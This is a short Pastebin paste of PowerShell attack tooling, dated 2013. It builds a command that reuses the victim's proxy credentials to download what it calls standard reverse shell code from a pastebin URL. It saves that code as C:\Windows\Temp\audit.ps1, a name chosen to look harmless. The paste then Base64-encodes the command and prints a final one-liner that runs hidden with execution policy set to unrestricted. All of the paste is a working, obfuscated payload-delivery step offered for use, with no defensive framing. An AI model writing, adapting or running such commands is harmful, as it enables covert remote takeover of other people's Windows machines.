powershell

PS Download RShell File Encoded Command

Sep 2nd, 2013
374
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.23 KB | None | 0 0
  1. #command to download (using proxy credentials) standard powershell reverse shell code and save to win\temp\audit.ps1
  2.  
  3. $command = '$wc = New-Object Net.WebClient;$wc.UseDefaultCredentials = $true;$wc.Proxy.Credentials = $wc.Credentials;$client = new-object System.Net.WebClient;$client.DownloadFile("http://pastebin.com/raw.php?i=A32ev8bC", "C:\Windows\Temp\audit.ps1" )'
  4.  
  5. $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
  6. $encodedCommand = [Convert]::ToBase64String($bytes)
  7. write-host $encodedCommand
  8.  
  9. End command is...
  10. powershell.exe -windowstyle hidden -executionpolicy unrestricted -encodedcommand JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcAYwAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdAByAHUAZQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdwBjAC4AQwByAGUAZABlAG4AdABpAGEAbABzADsAJABjAGwAaQBlAG4AdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALgBwAGgAcAA/AGkAPQBBADMAMgBlAHYAOABiAEMAIgAsACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAGEAdQBkAGkAdAAuAHAAcwAxACIAIAAgACkA
Add Comment
Please, Sign In to add comment